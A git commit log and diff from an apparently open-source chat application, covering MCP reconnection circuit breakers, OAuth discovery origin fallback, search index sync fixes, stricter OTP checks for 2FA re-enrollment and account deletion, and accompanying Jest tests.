* 📝 docs: Update AGENTS.md with testing philosophy and guidelines

Expanded the testing section in AGENTS.md to emphasize the importance of using real logic over mocks, advocating for the use of spies and real dependencies in tests. Added specific recommendations for testing with MongoDB and MCP SDK, highlighting the need to mock only uncontrollable external services. This update aims to improve testing practices and encourage more robust test implementations.

* 🧪 test: Enhance reconnection storm tests with socket tracking and SSE handling

Updated the reconnection storm test suite to include a new socket tracking mechanism for better resource management during tests. Improved the handling of SSE 400/405 responses by ensuring they are processed in the same branch as 404 errors, preventing unhandled cases. This enhances the reliability of the MCPConnection under rapid reconnect scenarios and ensures proper error handling.

* 🔧 fix: Implement cache eviction for stale reconnect attempts and missing tools

Added an `evictStale` function to manage the size of the `lastReconnectAttempts` and `missingToolCache` maps, ensuring they do not exceed a maximum cache size. This enhancement improves resource management by removing outdated entries based on a specified time-to-live (TTL), thereby optimizing the MCP service's performance during reconnection scenarios.
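The eviction idea reads roughly like the sketch below: drop entries older than a TTL, then trim oldest-first down to a size cap. The constant and signature are assumptions; it relies on JS `Map` preserving insertion order:

```javascript
// Sketch of TTL + size-cap eviction for a Map whose values are timestamps.
const MAX_CACHE_SIZE = 1000;

function evictStale(map, ttlMs, now = Date.now()) {
  // First pass: drop entries whose recorded timestamp is past the TTL.
  for (const [key, timestamp] of map) {
    if (now - timestamp > ttlMs) {
      map.delete(key);
    }
  }
  // Second pass: if still over budget, evict the oldest-inserted entries
  // (Map iterates in insertion order, so keys() yields oldest first).
  while (map.size > MAX_CACHE_SIZE) {
    map.delete(map.keys().next().value);
  }
}

const attempts = new Map([['a', 0], ['b', Date.now()]]);
evictStale(attempts, 60_000);
console.log([...attempts.keys()]); // only 'b' survives; 'a' is far past the TTL
```

Bounding both maps this way keeps long-running processes from accumulating one entry per server/user pair forever.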
2026-03-10 17:44:13 -04:00
Danny Avila
c0e876a2e6
🔄 refactor: OAuth Metadata Discovery with Origin Fallback (#12170)
* 🔄 refactor: OAuth Metadata Discovery with Origin Fallback

Updated the `discoverWithOriginFallback` method to improve the handling of OAuth authorization server metadata discovery. The method now retries with the origin URL when discovery fails for a path-based URL, ensuring consistent behavior across `discoverMetadata` and token refresh flows. This change reduces code duplication and enhances the reliability of the OAuth flow by providing a unified implementation for origin fallback logic.

* 🧪 test: Add tests for OAuth Token Refresh with Origin Fallback

Introduced new tests for the `refreshOAuthTokens` method in `MCPOAuthHandler` to validate the retry mechanism with the origin URL when path-based discovery fails. The tests cover scenarios where the first discovery attempt throws an error and the subsequent attempt succeeds, as well as cases where the discovery fails entirely. This enhances the reliability of the OAuth token refresh process by ensuring proper handling of discovery failures.

* chore: imports order

* fix: Improve Base URL Logging and Metadata Discovery in MCPOAuthHandler

Updated the logging to use a consistent base URL object when handling discovery failures in the MCPOAuthHandler. This change enhances error reporting by ensuring that the base URL is logged correctly, and it refines the metadata discovery process by returning the result of the discovery attempt with the base URL, improving the reliability of the OAuth flow.
2026-03-10 16:19:07 -04:00
Oreon Lothamer
eb6328c1d9
🛤️ fix: Base URL Fallback for Path-based OAuth Discovery in Token Refresh (#12164)
* fix: add base URL fallback for path-based OAuth discovery in token refresh

The two `refreshOAuthTokens` paths in `MCPOAuthHandler` were missing the
origin-URL fallback that `initiateOAuthFlow` already had. With MCP SDK
1.27.1, `buildDiscoveryUrls` appends the server path to the
`.well-known` URL (e.g. `/.well-known/oauth-authorization-server/mcp`),
which returns 404 for servers like Sentry that only expose the root
discovery endpoint (`/.well-known/oauth-authorization-server`).

Without the fallback, discovery returns null during refresh, the token
endpoint resolves to the wrong URL, and users are prompted to
re-authenticate every time their access token expires instead of the
refresh token being exchanged silently.

Both refresh paths now mirror the `initiateOAuthFlow` pattern: if
discovery fails and the server URL has a non-root path, retry with just
the origin URL.
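The fallback pattern both paths now share can be sketched like this. The `discover` argument stands in for the SDK's metadata discovery call (injected here so the sketch is self-contained); the real helper is a private static on `MCPOAuthHandler`:

```javascript
// Sketch: try discovery at the full server URL; if it fails or returns
// nothing and the URL has a non-root path, retry with just the origin.
async function discoverWithOriginFallback(serverUrl, discover) {
  const url = new URL(serverUrl);
  try {
    const metadata = await discover(url);
    if (metadata) {
      return metadata;
    }
  } catch {
    // Path-based discovery failed; fall through to the origin retry.
  }
  // Only retry when there is actually a path to strip (e.g. https://host/mcp).
  if (url.pathname !== '/' && url.pathname !== '') {
    return discover(new URL(url.origin));
  }
  return null;
}

// A discover stub that only answers at the root, like servers exposing just
// the root .well-known endpoint:
const discover = async (u) => (u.pathname === '/' ? { issuer: u.origin } : null);
discoverWithOriginFallback('https://example.com/mcp', discover).then((m) =>
  console.log(m), // → { issuer: 'https://example.com' }
);
```

Because the retry condition checks the pathname, servers whose URL is already the origin never trigger a redundant second request.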

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: extract discoverWithOriginFallback helper; add tests

Extract the duplicated path-based URL retry logic from both
`refreshOAuthTokens` branches into a single private static helper
`discoverWithOriginFallback`, reducing the risk of the two paths
drifting in the future.

Add three tests covering the new behaviour:
- stored clientInfo path: asserts discovery is called twice (path then
  origin) and that the token endpoint from the origin discovery is used
- auto-discovered path: same assertions for the branchless path
- root URL: asserts discovery is called only once when the server URL
  already has no path component

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: use discoverWithOriginFallback in discoverMetadata too

Remove the inline duplicate of the origin-fallback logic from
`discoverMetadata` and replace it with a call to the shared
`discoverWithOriginFallback` helper, giving all three discovery
sites a single implementation.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: use mock.calls + .href/.toString() for URL assertions

Replace brittle `toHaveBeenNthCalledWith(new URL(...))` comparisons
with `expect.any(URL)` matchers and explicit `.href`/`.toString()`
checks on the captured call args, consistent with the existing
mock.calls pattern used throughout handler.test.ts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-10 15:04:35 -04:00
matt burnett
ad5c51f62b
⛈️ fix: MCP Reconnection Storm Prevention with Circuit Breaker, Backoff, and Tool Stubs (#12162)
* fix: MCP reconnection stability - circuit breaker, throttling, and cooldown retry

* Comment and logging cleanup

* fix broken tests
2026-03-10 14:21:36 -04:00
100 changed files with 9446 additions and 946 deletions

View file

@@ -850,3 +850,24 @@ OPENWEATHER_API_KEY=
# Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it)
# When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration
# MCP_SKIP_CODE_CHALLENGE_CHECK=false
# Circuit breaker: max connect/disconnect cycles before tripping (per server)
# MCP_CB_MAX_CYCLES=7
# Circuit breaker: sliding window (ms) for counting cycles
# MCP_CB_CYCLE_WINDOW_MS=45000
# Circuit breaker: cooldown (ms) after the cycle breaker trips
# MCP_CB_CYCLE_COOLDOWN_MS=15000
# Circuit breaker: max consecutive failed connection rounds before backoff
# MCP_CB_MAX_FAILED_ROUNDS=3
# Circuit breaker: sliding window (ms) for counting failed rounds
# MCP_CB_FAILED_WINDOW_MS=120000
# Circuit breaker: base backoff (ms) after failed round threshold is reached
# MCP_CB_BASE_BACKOFF_MS=30000
# Circuit breaker: max backoff cap (ms) for exponential backoff
# MCP_CB_MAX_BACKOFF_MS=300000
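These knobs could be centralized into one config object roughly as follows. The helper name and shape are illustrative, not the actual LibreChat code; the defaults mirror the commented values above:

```javascript
// Read the circuit-breaker environment variables with sane fallbacks.
function readCircuitBreakerConfig(env = process.env) {
  const int = (name, fallback) => {
    const parsed = Number.parseInt(env[name] ?? '', 10);
    return Number.isFinite(parsed) ? parsed : fallback;
  };
  return {
    maxCycles: int('MCP_CB_MAX_CYCLES', 7),
    cycleWindowMs: int('MCP_CB_CYCLE_WINDOW_MS', 45000),
    cycleCooldownMs: int('MCP_CB_CYCLE_COOLDOWN_MS', 15000),
    maxFailedRounds: int('MCP_CB_MAX_FAILED_ROUNDS', 3),
    failedWindowMs: int('MCP_CB_FAILED_WINDOW_MS', 120000),
    baseBackoffMs: int('MCP_CB_BASE_BACKOFF_MS', 30000),
    maxBackoffMs: int('MCP_CB_MAX_BACKOFF_MS', 300000),
  };
}

console.log(readCircuitBreakerConfig({ MCP_CB_MAX_CYCLES: '10' }).maxCycles); // 10
console.log(readCircuitBreakerConfig({}).cycleWindowMs); // 45000
```

Parsing in one place means a malformed value degrades to the documented default instead of `NaN` leaking into timing math.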

View file

@@ -149,7 +149,15 @@ Multi-line imports count total character length across all lines. Consolidate va
- Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc.
- Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering.
- Cover loading, success, and error states for UI/data flows.
- Mock data-provider hooks and external dependencies.

### Philosophy

- **Real logic over mocks.** Exercise actual code paths with real dependencies. Mocking is a last resort.
- **Spies over mocks.** Assert that real functions are called with expected arguments and frequency without replacing underlying logic.
- **MongoDB**: use `mongodb-memory-server` for a real in-memory MongoDB instance. Test actual queries and schema validation, not mocked DB calls.
- **MCP**: use real `@modelcontextprotocol/sdk` exports for servers, transports, and tool definitions. Mirror real scenarios, don't stub SDK internals.
- Only mock what you cannot control: external HTTP APIs, rate-limited services, non-deterministic system calls.
- Heavy mocking is a code smell, not a testing strategy.
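The "spies over mocks" bullet can be illustrated with a hand-rolled spy; `jest.spyOn` provides the same wrap-and-record behavior, so this plain-JS version is only a sketch of the idea:

```javascript
// A spy wraps the real function, records each call, and still runs the
// original logic — unlike a mock, which replaces the behavior entirely.
function spyOn(obj, method) {
  const original = obj[method];
  const calls = [];
  obj[method] = (...args) => {
    calls.push(args);
    return original.apply(obj, args); // real implementation still executes
  };
  obj[method].calls = calls;
  return obj[method];
}

const math = { add: (a, b) => a + b };
const spy = spyOn(math, 'add');
const sum = math.add(2, 3);
console.log(sum); // 5 — the real implementation ran
console.log(spy.calls.length); // 1 — and the call was recorded
```

Assertions then target `spy.calls` (arguments, frequency) while the code under test exercises its genuine dependencies.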
---

View file

@@ -1,7 +1,6 @@
const DALLE3 = require('../DALLE3');
const { ProxyAgent } = require('undici');
-jest.mock('tiktoken');
const processFileURL = jest.fn();
describe('DALLE3 Proxy Configuration', () => {

View file

@@ -14,15 +14,6 @@ jest.mock('@librechat/data-schemas', () => {
  };
});
-jest.mock('tiktoken', () => {
-  return {
-    encoding_for_model: jest.fn().mockReturnValue({
-      encode: jest.fn(),
-      decode: jest.fn(),
-    }),
-  };
-});
const processFileURL = jest.fn();
const generate = jest.fn();

View file

@@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) {
    const messageCount = messageProgress.totalDocuments;
    const messagesIndexed = messageProgress.totalProcessed;
    const unindexedMessages = messageCount - messagesIndexed;
-    if (settingsUpdated || unindexedMessages > syncThreshold) {
+    const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0;
+    if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) {
+      if (noneIndexed && !settingsUpdated) {
+        logger.info('[indexSync] No messages marked as indexed, forcing full sync');
+      }
      logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`);
      await Message.syncWithMeili();
      messagesSync = true;
@@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) {
    const convoCount = convoProgress.totalDocuments;
    const convosIndexed = convoProgress.totalProcessed;
    const unindexedConvos = convoCount - convosIndexed;
-    if (settingsUpdated || unindexedConvos > syncThreshold) {
+    const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0;
+    if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) {
+      if (noneConvosIndexed && !settingsUpdated) {
+        logger.info('[indexSync] No conversations marked as indexed, forcing full sync');
+      }
      logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`);
      await Conversation.syncWithMeili();
      convosSync = true;

View file

@@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => {
    );
    expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)');
  });
test('forces sync when zero documents indexed (reset scenario) even if below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 76,
isComplete: false,
});
Message.syncWithMeili.mockResolvedValue(undefined);
Conversation.syncWithMeili.mockResolvedValue(undefined);
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).toHaveBeenCalledTimes(1);
expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] Starting message sync (680 unindexed)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)');
});
test('does NOT force sync when some documents already indexed and below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 630,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 70,
totalDocuments: 76,
isComplete: false,
});
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).not.toHaveBeenCalled();
expect(Conversation.syncWithMeili).not.toHaveBeenCalled();
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 50 messages unindexed (below threshold: 1000, skipping)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 6 convos unindexed (below threshold: 1000, skipping)',
);
});
});

View file

@@ -9,7 +9,7 @@ module.exports = {
  moduleNameMapper: {
    '~/(.*)': '<rootDir>/$1',
    '~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json',
-    '^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part
+    '^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js',
    '^openid-client$': '<rootDir>/test/__mocks__/openid-client.js',
  },
  transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'],

View file

@@ -228,7 +228,7 @@ module.exports = {
        },
      ],
    };
-  } catch (err) {
+  } catch (_err) {
    logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning');
  }
  if (cursorFilter) {
@@ -361,6 +361,7 @@ module.exports = {
    const deleteMessagesResult = await deleteMessages({
      conversationId: { $in: conversationIds },
+      user,
    });
    return { ...deleteConvoResult, messages: deleteMessagesResult };

View file

@@ -549,6 +549,7 @@ describe('Conversation Operations', () => {
      expect(result.messages.deletedCount).toBe(5);
      expect(deleteMessages).toHaveBeenCalledWith({
        conversationId: { $in: [mockConversationData.conversationId] },
+        user: 'user123',
      });
      // Verify conversation was deleted

View file

@@ -51,6 +51,7 @@
    "@modelcontextprotocol/sdk": "^1.27.1",
    "@node-saml/passport-saml": "^5.1.0",
    "@smithy/node-http-handler": "^4.4.5",
+   "ai-tokenizer": "^1.0.6",
    "axios": "^1.13.5",
    "bcryptjs": "^2.4.3",
    "compression": "^1.8.1",
@@ -66,7 +67,7 @@
    "express-rate-limit": "^8.3.0",
    "express-session": "^1.18.2",
    "express-static-gzip": "^2.2.0",
-   "file-type": "^18.7.0",
+   "file-type": "^21.3.2",
    "firebase": "^11.0.2",
    "form-data": "^4.0.4",
    "handlebars": "^4.7.7",
@@ -106,10 +107,9 @@
    "pdfjs-dist": "^5.4.624",
    "rate-limit-redis": "^4.2.0",
    "sharp": "^0.33.5",
-   "tiktoken": "^1.0.15",
    "traverse": "^0.6.7",
    "ua-parser-js": "^1.0.36",
-   "undici": "^7.18.2",
+   "undici": "^7.24.1",
    "winston": "^3.11.0",
    "winston-daily-rotate-file": "^5.0.0",
    "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",

View file

@@ -1,5 +1,6 @@
const { encryptV3, logger } = require('@librechat/data-schemas');
const {
+  verifyOTPOrBackupCode,
  generateBackupCodes,
  generateTOTPSecret,
  verifyBackupCode,
@@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, '');
/**
 * Enable 2FA for the user by generating a new TOTP secret and backup codes.
 * The secret is encrypted and stored, and 2FA is marked as disabled until confirmed.
+ * If 2FA is already enabled, requires OTP or backup code verification to re-enroll.
 */
const enable2FA = async (req, res) => {
  try {
    const userId = req.user.id;
-    const secret = generateTOTPSecret();
-    const { plainCodes, codeObjects } = await generateBackupCodes();
-    // Encrypt the secret with v3 encryption before saving.
-    const encryptedSecret = encryptV3(secret);
-    // Update the user record: store the secret & backup codes and set twoFactorEnabled to false.
-    const user = await updateUser(userId, {
-      totpSecret: encryptedSecret,
-      backupCodes: codeObjects,
-      twoFactorEnabled: false,
-    });
-    const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`;
+    const existingUser = await getUserById(
+      userId,
+      '+totpSecret +backupCodes _id twoFactorEnabled email',
+    );
+    if (existingUser && existingUser.twoFactorEnabled) {
+      const { token, backupCode } = req.body;
+      const result = await verifyOTPOrBackupCode({
+        user: existingUser,
+        token,
+        backupCode,
+        persistBackupUse: false,
+      });
+      if (!result.verified) {
+        const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
+    }
+    const secret = generateTOTPSecret();
+    const { plainCodes, codeObjects } = await generateBackupCodes();
+    const encryptedSecret = encryptV3(secret);
+    const user = await updateUser(userId, {
+      pendingTotpSecret: encryptedSecret,
+      pendingBackupCodes: codeObjects,
+    });
+    const email = user.email || (existingUser && existingUser.email) || '';
+    const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`;

    return res.status(200).json({ otpauthUrl, backupCodes: plainCodes });
  } catch (err) {
@@ -46,13 +65,14 @@ const verify2FA = async (req, res) => {
  try {
    const userId = req.user.id;
    const { token, backupCode } = req.body;
-    const user = await getUserById(userId, '_id totpSecret backupCodes');
+    const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id');
+    const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
-    if (!user || !user.totpSecret) {
+    if (!user || !secretSource) {
      return res.status(400).json({ message: '2FA not initiated' });
    }
-    const secret = await getTOTPSecret(user.totpSecret);
+    const secret = await getTOTPSecret(secretSource);
    let isVerified = false;
    if (token) {
@@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => {
  try {
    const userId = req.user.id;
    const { token } = req.body;
-    const user = await getUserById(userId, '_id totpSecret');
+    const user = await getUserById(
+      userId,
+      '+totpSecret +pendingTotpSecret +pendingBackupCodes _id',
+    );
+    const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
-    if (!user || !user.totpSecret) {
+    if (!user || !secretSource) {
      return res.status(400).json({ message: '2FA not initiated' });
    }
-    const secret = await getTOTPSecret(user.totpSecret);
+    const secret = await getTOTPSecret(secretSource);
    if (await verifyTOTP(secret, token)) {
-      await updateUser(userId, { twoFactorEnabled: true });
+      const update = {
+        totpSecret: user.pendingTotpSecret ?? user.totpSecret,
+        twoFactorEnabled: true,
+        pendingTotpSecret: null,
+        pendingBackupCodes: [],
+      };
+      if (user.pendingBackupCodes?.length) {
+        update.backupCodes = user.pendingBackupCodes;
+      }
+      await updateUser(userId, update);
      return res.status(200).json();
    }
    return res.status(400).json({ message: 'Invalid token.' });
@@ -104,31 +137,27 @@ const disable2FA = async (req, res) => {
  try {
    const userId = req.user.id;
    const { token, backupCode } = req.body;
-    const user = await getUserById(userId, '_id totpSecret backupCodes');
+    const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
    if (!user || !user.totpSecret) {
      return res.status(400).json({ message: '2FA is not setup for this user' });
    }
    if (user.twoFactorEnabled) {
-      const secret = await getTOTPSecret(user.totpSecret);
-      let isVerified = false;
-      if (token) {
-        isVerified = await verifyTOTP(secret, token);
-      } else if (backupCode) {
-        isVerified = await verifyBackupCode({ user, backupCode });
-      } else {
-        return res
-          .status(400)
-          .json({ message: 'Either token or backup code is required to disable 2FA' });
-      }
-      if (!isVerified) {
-        return res.status(401).json({ message: 'Invalid token or backup code' });
-      }
+      const result = await verifyOTPOrBackupCode({ user, token, backupCode });
+      if (!result.verified) {
+        const msg = result.message ?? 'Either token or backup code is required to disable 2FA';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
    }
-    await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false });
+    await updateUser(userId, {
+      totpSecret: null,
+      backupCodes: [],
+      twoFactorEnabled: false,
+      pendingTotpSecret: null,
+      pendingBackupCodes: [],
+    });
    return res.status(200).json();
  } catch (err) {
    logger.error('[disable2FA]', err);
@@ -138,10 +167,28 @@ const disable2FA = async (req, res) => {
/**
 * Regenerate backup codes for the user.
+ * Requires OTP or backup code verification if 2FA is already enabled.
 */
const regenerateBackupCodes = async (req, res) => {
  try {
    const userId = req.user.id;
+    const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
+    if (!user) {
+      return res.status(404).json({ message: 'User not found' });
+    }
+    if (user.twoFactorEnabled) {
+      const { token, backupCode } = req.body;
+      const result = await verifyOTPOrBackupCode({ user, token, backupCode });
+      if (!result.verified) {
+        const msg =
+          result.message ?? 'TOTP token or backup code is required to regenerate backup codes';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
+    }
    const { plainCodes, codeObjects } = await generateBackupCodes();
    await updateUser(userId, { backupCodes: codeObjects });
    return res.status(200).json({

View file

@@ -14,6 +14,7 @@ const {
  deleteMessages,
  deletePresets,
  deleteUserKey,
+  getUserById,
  deleteConvos,
  deleteFiles,
  updateUser,
@@ -34,6 +35,7 @@ const {
  User,
} = require('~/db/models');
const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService');
+const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService');
const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService');
const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config');
const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools');
@@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => {
  const { user } = req;
  try {
+    const existingUser = await getUserById(
+      user.id,
+      '+totpSecret +backupCodes _id twoFactorEnabled',
+    );
+    if (existingUser && existingUser.twoFactorEnabled) {
+      const { token, backupCode } = req.body;
+      const result = await verifyOTPOrBackupCode({ user: existingUser, token, backupCode });
+      if (!result.verified) {
+        const msg =
+          result.message ??
+          'TOTP token or backup code is required to delete account with 2FA enabled';
+        return res.status(result.status ?? 400).json({ message: msg });
+      }
+    }
    await deleteMessages({ user: user.id }); // delete user messages
    await deleteAllUserSessions({ userId: user.id }); // delete user sessions
    await Transaction.deleteMany({ user: user.id }); // delete user transactions

View file

@@ -0,0 +1,264 @@
const mockGetUserById = jest.fn();
const mockUpdateUser = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockGenerateTOTPSecret = jest.fn();
const mockGenerateBackupCodes = jest.fn();
const mockEncryptV3 = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
encryptV3: (...args) => mockEncryptV3(...args),
logger: { error: jest.fn() },
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
generateBackupCodes: (...args) => mockGenerateBackupCodes(...args),
generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args),
verifyBackupCode: jest.fn(),
getTOTPSecret: jest.fn(),
verifyTOTP: jest.fn(),
}));
jest.mock('~/models', () => ({
getUserById: (...args) => mockGetUserById(...args),
updateUser: (...args) => mockUpdateUser(...args),
}));
const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
return res;
}
const PLAIN_CODES = ['code1', 'code2', 'code3'];
const CODE_OBJECTS = [
{ codeHash: 'h1', used: false, usedAt: null },
{ codeHash: 'h2', used: false, usedAt: null },
{ codeHash: 'h3', used: false, usedAt: null },
];
beforeEach(() => {
jest.clearAllMocks();
mockGenerateTOTPSecret.mockReturnValue('NEWSECRET');
mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS });
mockEncryptV3.mockReturnValue('encrypted-secret');
});
describe('enable2FA', () => {
it('allows first-time setup without token — writes to pending fields', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }),
);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
expect(updateCall).not.toHaveProperty('backupCodes');
});
it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
persistBackupUse: false,
});
expect(res.status).toHaveBeenCalledWith(200);
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
});
it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => {
const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith(
expect.objectContaining({ persistBackupUse: false }),
);
expect(res.status).toHaveBeenCalledWith(200);
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockUpdateUser).not.toHaveBeenCalled();
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockUpdateUser).not.toHaveBeenCalled();
});
});
describe('regenerateBackupCodes', () => {
it('returns 404 when user not found', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(404);
expect(res.json).toHaveBeenCalledWith({ message: 'User not found' });
});
it('requires OTP when 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(400);
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
